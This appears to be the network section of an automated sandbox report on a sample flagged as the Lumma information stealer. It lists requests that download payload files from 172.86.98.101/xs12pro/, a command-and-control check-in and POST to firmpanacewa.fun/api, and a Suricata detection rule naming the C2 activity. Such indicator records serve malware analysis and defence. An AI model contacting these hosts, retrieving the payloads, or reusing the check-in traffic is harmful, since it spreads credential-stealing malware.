Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
firmpanacewa.fun | 172.67.181.9 |
GET
200
http://172.86.98.101/xs12pro/Gpflofkmce.dat
REQUEST
RESPONSE
BODY
GET /xs12pro/Gpflofkmce.dat HTTP/1.1
Host: 172.86.98.101
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 09 Oct 2023 04:17:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 04 Oct 2023 10:42:47 GMT
ETag: "79808-606e1ab0677c0"
Accept-Ranges: bytes
Content-Length: 497672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET
200
http://firmpanacewa.fun/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: TeslaBrowser/5.5
Host: firmpanacewa.fun
HTTP/1.1 200 OK
Date: Mon, 09 Oct 2023 04:18:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0%2FVrVUoTydcH14FxqUdFY8mpSMHh2pds7hSKTcn3igig6RW4mb0TyvyIk9boXSEz7gC7jTsjyArjWY4A33c454s5v3BD1ap5iVD6SJJOq3lWn23Gkdr%2FMgonQ39W1cnn2gn8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8133d1541ea48d28-KIX
GET
200
http://172.86.98.101/xs12pro/Rglrwzz.vdf
REQUEST
RESPONSE
BODY
GET /xs12pro/Rglrwzz.vdf HTTP/1.1
Host: 172.86.98.101
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 09 Oct 2023 04:18:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 04 Oct 2023 10:46:22 GMT
ETag: "100208-606e1b7d71b80"
Accept-Ranges: bytes
Content-Length: 1049096
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
POST
200
http://firmpanacewa.fun/api
REQUEST
RESPONSE
BODY
POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: firmpanacewa.fun
Content-Length: 84
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 09 Oct 2023 04:18:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E7%2FFR7E19xVQuAyn9MXJhlqQZxZZr4lBiXRUO21c51UsyFCc6zCAaN83y2PgBMKrV9gTXuElQRQbxErN6lNSXS0KmzUP9HLUTv86UeJOGdIA2ry9lOo%2B%2B3HL3HsK0tviimQ4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8133d1550d5c0aba-KIX
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 172.67.181.9:80 | 2048093 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Check-In | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts